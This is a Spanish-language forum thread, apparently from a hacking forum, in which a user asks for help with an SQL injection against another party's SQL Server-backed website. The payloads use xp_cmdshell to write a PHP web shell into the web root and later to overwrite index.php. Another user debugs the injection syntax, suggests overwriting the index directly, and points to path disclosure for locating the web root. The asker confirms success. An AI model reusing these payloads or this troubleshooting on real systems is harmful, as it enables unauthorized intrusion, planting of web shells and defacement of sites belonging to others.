Título: pregunta v2 , sql server Publicado por: PHAMTOM en 19 Noviembre 2009, 22:43 pm hola
yo queria atravez de sql server , de una iyneccion en las bases de datos de una web que corre por sql server queria subirle un archivo ,pero , me pueden corregir el codigo,no lo sube y lo vi varias veces. '';exec master..xp_cmdshell 'echo ^<? $d=fopen("index.php","w");$s=$_REQUEST["variable"];fputs($d,$s);fclose($d); ?^> > C:\AppServ\www\update.php'-- Queria subir el archivo update,con el siguiente codigo . Gracias de antemano el individuo usa appserver Título: Re: pregunta v2 , sql server Publicado por: WHK en 19 Noviembre 2009, 23:52 pm y para que quieres modificar el index.php desde update.php si puedes hacerlo directamente desde el exec que invocaste en la query?.
Si no te funciona talves tengan deshabilitada esa función o el directorio se encuentre a modo solo de lectura creado por un administrador, en ese caso no podrías sobreescribir archivos y por politicas de seguridad de win tampoco crear usuarios nt. También recuerda que no es lo mismo "--" a decir " -- " ya que '-- no existe ni te lo va a reconocer el servidor sql, debes dejar un espacio en blanco antes y despues de las lineas de comentario. Título: Re: pregunta v2 , sql server Publicado por: PHAMTOM en 20 Noviembre 2009, 02:18 am Problema solucionado , gracias otra vez WHK.
Título: Re: pregunta v2 , sql server Publicado por: ChElAnO en 20 Noviembre 2009, 02:39 am Citar Problema solucionado , gracias otra vez WHK. como? Título: Re: pregunta v2 , sql server Publicado por: PHAMTOM en 20 Noviembre 2009, 16:27 pm Claro, ahora estaba viendo de modificar el index.php, desde exec.
''exec master.xp_cmdshell 'echo hola ^> C:\AppServ\www\index.php' -- si el servidor acepta " exec " y el index.php se ubique en la ruta especificada , funcionaria? C:\AppServ\www\index.php Título: Re: pregunta v2 , sql server Publicado por: WHK en 20 Noviembre 2009, 18:35 pm si, para eso existe lo que se llama path disclosure
http://foro.elhacker.net/nivel_web/diccionario_informatico_sobre_bugs_y_exploits_en_nivel_web_v10-t264007.0.html lo scas tratando de forzar algún error o algo que te pueda servir. |